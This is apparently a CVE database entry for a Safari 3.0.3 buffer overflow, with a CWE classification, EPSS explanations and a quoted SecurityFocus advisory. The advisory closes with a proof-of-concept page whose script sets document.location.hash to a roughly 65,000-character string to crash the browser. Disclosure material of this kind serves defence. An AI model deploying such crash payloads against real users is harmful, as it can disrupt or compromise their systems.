CVE Descriptions

Buffer overflow in Apple Safari 3.0.3 522.15.5, and other versions before Beta Update 3.0.4, allows remote attackers to cause a denial of service (crash) and possibly have other unspecified impact by setting document.location.hash to a long string. Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/26448/info Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage. A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. <html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html>
